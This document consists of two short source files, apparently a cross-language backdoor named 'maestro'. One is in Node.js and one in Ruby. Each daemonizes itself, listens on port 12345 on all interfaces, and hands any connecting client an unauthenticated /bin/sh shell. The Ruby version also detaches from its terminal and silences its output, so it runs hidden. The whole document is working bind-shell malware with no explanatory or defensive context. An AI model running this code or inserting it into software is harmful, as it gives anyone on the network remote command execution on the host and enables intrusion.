File: NodeJS/amd64/maestro.js
const net = require('net');
const { exec } = require('child_process');

const PORT = 12345;

function daemonize() {
  const fork = require('child_process').fork;
  fork(__filename, ['child']);
  process.exit();
}

function handleConnection(socket) {
  const shell = exec('/bin/sh');

  socket.pipe(shell.stdin);
  shell.stdout.pipe(socket);
  shell.stderr.pipe(socket);

  shell.on('exit', () => {
    socket.end();
  });
}

if (process.argv[2] !== 'child') {
  daemonize();
}

const server = net.createServer(handleConnection);
server.listen(PORT, '0.0.0.0');

File: Ruby/amd64/maestro.rb
require 'socket'

PORT = 12345

def daemonize
  pid = fork
  exit if pid
  Process.setsid
  pid = fork
  exit if pid
  File.umask(0)
  STDIN.reopen('/dev/null')
  STDOUT.reopen('/dev/null', 'a')
  STDERR.reopen('/dev/null', 'a')
end

def handle_connection(client)
  STDIN.reopen(client)
  STDOUT.reopen(client)
  STDERR.reopen(client)

  exec '/bin/sh'
end

def main
  daemonize

  server = TCPServer.new('0.0.0.0', PORT)

  loop do
    client = server.accept
    pid = fork do
      server.close
      handle_connection(client)
    end
    client.close
    Process.detach(pid)
  end
end

main
